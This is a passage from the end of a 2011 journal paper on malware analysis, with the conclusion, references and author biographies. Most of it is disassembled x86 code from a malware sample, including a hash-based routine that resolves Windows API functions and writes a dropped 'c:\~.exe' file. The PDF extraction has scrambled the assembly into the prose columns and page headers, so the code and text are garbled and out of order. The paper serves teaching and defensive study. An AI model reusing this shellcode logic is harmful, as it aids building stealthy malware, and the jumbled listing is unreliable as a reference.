seg000:00000D5B arg_0
= dword ptr 8
seg000:00000D18
push
[edi+SCRATCH.field_4]
seg000:00000D5B arg_4
= dword ptr 0Ch
seg000:00000D1B
push [edi+SCRATCH.pMallocdBuff0]
IJ
ebx, [edi+SCRATCH.endMarker]
; sub_B45+7Ap ...
seg000:00000D5B
push eax
seg000:00000D5B
seg000:00000D1F
call
[edi+SCRATCH.pWriteFile]
seg000:00000D5C
seg000:00000D22
push
0
prologue
seg000:00000D24
lea
seg000:00000D2A seg000:00000D2B
push ebp mov
; standard function prologue ebp, esp
seg000:00000D5E
push edi
push ebx
seg000:00000D5F
mov
push 0FFh
seg000:00000D62
seg000:00000D30
push
[edi+SCRATCH.szDOCFILENAME]
ebx
seg000:00000D33
push
[edi+SCRATCH.hFileTwo]
seg000:00000D65
push
esi
seg000:00000D36
call
[edi+SCRATCH.pWriteFile]
seg000:00000D66
mov
esi, [ebx+3Ch]
seg000:00000D39
push
[edi+SCRATCH.hFileTwo]
seg000:00000D69
mov
esi, [esi+ebx+78h]
seg000:00000D6D
add
esi, ebx
seg000:00000D6F
push esi
ebx, [edi+SCRATCH.endMarker]
seg000:00000D3C ; The code is cleaning up by closing its open
file handles and releasing
ISSN: 2230-7818
I
seg000:00000D5B
lea
seg000:00000D3C
T
seg000:00000D5B ; Attributes: bp-based frame
seg000:00000D11
seg000:00000D3C
U
seg000:00000D5B
40000000h
seg000:00000D0F
seg000:00000D1E
O
¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦
; the heap back to the OS.
; save the scratch pad again
edi, [ebp+arg_0] ; move arg[0] into edi
mov
ebx, [ebp+arg_4] ; move arg[1] into
seg000:00000D70
mov
esi, [esi+20h]
seg000:00000D73
add
esi, ebx
@ 2011 http://www.ijaest.iserp.org. All rights Reserved.
; standard function
Page 10
S. Murugan et al. / (IJAEST) INTERNATIONAL JOURNAL OF ADVANCED ENGINEERING SCIENCES AND TECHNOLOGIES Vol No. 2, Issue No. 1, 001 - 012
seg000:00000D75
xor
ecx, ecx
seg000:00000DAF loc_DAF:
seg000:00000D77
dec
ecx
seg000:00000B40j seg000:00000DAF
seg000:00000D78 seg000:00000D78 loc_D78:
; CODE XREF:
; CODE XREF:
call
sub_B45
seg000:00000DAF ; --------------------------------------------------------------------------
resolve_func+36j
seg000:00000DB4
ecx
dd 0A2000h
seg000:00000D78
inc
seg000:00000D79
lodsd
seg000:00000D7A
add
seg000:00000D7C
push esi
seg000:00000DC4 aC_exe:
seg000:00000D7D
xor
seg000:00000DC4
seg000:00000DB8 aC: seg000:00000DB8
eax, ebx
esi, esi
unicode 0, <c:\~$>,0
unicode 0, <c:\~.exe>,0
seg000:00000DD6 aC_exe_0
seg000:00000D7F seg000:00000D7F loc_D7F:
; CODE XREF:
db 'c:\~.exe',0
seg000:00000DDF
db 0Eh db 0
movsx edx, byte ptr [eax]
seg000:00000DE1
db 0FFh
seg000:00000D82
cmp
seg000:00000DE2
db 0FFh
seg000:00000D84
jz
seg000:00000DE3
db 0FFh
seg000:00000DE4
endp
dh, dl short loc_D8E
ror
esi, 0Dh
seg000:00000D89
add
esi, edx
seg000:00000D8B
inc
eax
seg000:00000D8C
jmp
; rotate right function
ES
seg000:00000D86
T
seg000:00000DE0
seg000:00000D7F
resolve_func+31j
7. CONCLUSION
short loc_D7F
Malware analysis is becoming an important field of
seg000:00000D8E ; -------------------------------------------------------------------
specialization for forensic analysts. Authors of malware are
--------
becoming increasingly profit driven and are incorporating
seg000:00000D8E seg000:00000D8E loc_D8E:
; CODE XREF:
resolve_func+29j
possible.
seg000:00000D8E
cmp
seg000:00000D90
pop
seg000:00000D91
jnz
seg000:00000D93
pop
edx
seg000:00000D94
mov
ebp, ebx
seg000:00000D96
mov
ebx, [edx+24h]
seg000:00000D99
add
ebx, ebp
edi, esi
A
mov
Malware
is
being
written
by
professional
programmers who are very knowledgeable in their craft.
esi short loc_D78
cx, [ebx+ecx*2]
IJ
seg000:00000D9B
techniques to make their code as stealthy and undetectable as
They have a very good understanding of digital forensic methods and endeavor to make forensic analysis as difficult as possible. The knowledge domain required to competently
seg000:00000D9F
mov
ebx, [edx+1Ch]
seg000:00000DA2
add
ebx, ebp
seg000:00000DA4
mov
eax, [ebx+ecx*4]
brief introduction to a Malware Analysis Body of Knowledge
seg000:00000DA7
add
eax, ebp
that would be suitable for establishing a framework for
seg000:00000DA9
pop
esi
competency development and assessment for the field of
seg000:00000DAA
pop
edi
seg000:00000DAB
pop
ebp
malware analysis and for incorporation into academic
seg000:00000DAC
retn
8
analyze malware is very broad. This paper has presented a
curricula. A learning taxonomy is central to the malware
seg000:00000DAC resolve_func endp
analysis process and eight domain areas were identified.
seg000:00000DAC
These areas include malware, programming, anti-forensics,
seg000:00000DAF ; -------------------------------------------------------------------
malware analysis, tools, legal and ethical considerations,
-------seg000:00000DAF
ISSN: 2230-7818
environment and collection.
@ 2011 http://www.ijaest.iserp.org. All rights Reserved.
Page 11
S. Murugan et al. / (IJAEST) INTERNATIONAL JOURNAL OF ADVANCED ENGINEERING SCIENCES AND TECHNOLOGIES Vol No. 2, Issue No. 1, 001 - 012
REFERENCES [1].The Malware Analysis Body of Knowledge - Craig Valli and Murray Brand. [2].Reverse Engineering Malware - Lenny Zeltser . [3].Malware analysis : An Introduction - Dennis Distler [4].Introduction to Malware Analysis - Lenny Zeltser [5].Practical Malware Analysis â&#x20AC;&#x201C; Kris Kendall
ES
Mr S.MURUGAN is Working as ACTS Team Coordinator , CDAC ,Bangalore.He received BSc in Physics from Madurai Kamaraj University ,Madurai, in 1989 and MCA degree in Computer Applications from Alagappa University,Karaikudi,Tamilnadu ,India and MPhil(CS) from Manonmaniam Sundaranar University,Tirunelveli,Tamilnadu,India . He has 17 years of teaching and admin experience at PG level in the field of Computer Science. He has published 6 papers in the National conferences and 2 in International conference. His research interests include: Intelligence Network Security Algorithms, Malware prevention and Detection mechanism and algorithm. He has published 8 books and courseware in the field of Computer Science.
T
Author Biography:
IJ
A
Dr.K.Kuppusamy is working as an Associate Professor, Department of Computer Science and Engineering, Alagappa University, Karaikukdi, Tamilnadu, India. He received his Ph.D in Computer Science and Engineering from Alagappa University, Karaikudi, Tamilnadu in the year 2007. He has published many papers in International & National Journals and presented in National and International conferences. His area of research interest include Information/Network Security, Algorithms, Neural Networks, Fault Tolerant Computing, Software Engineering & Testing and Operational Research.
ISSN: 2230-7818
@ 2011 http://www.ijaest.iserp.org. All rights Reserved.
Page 12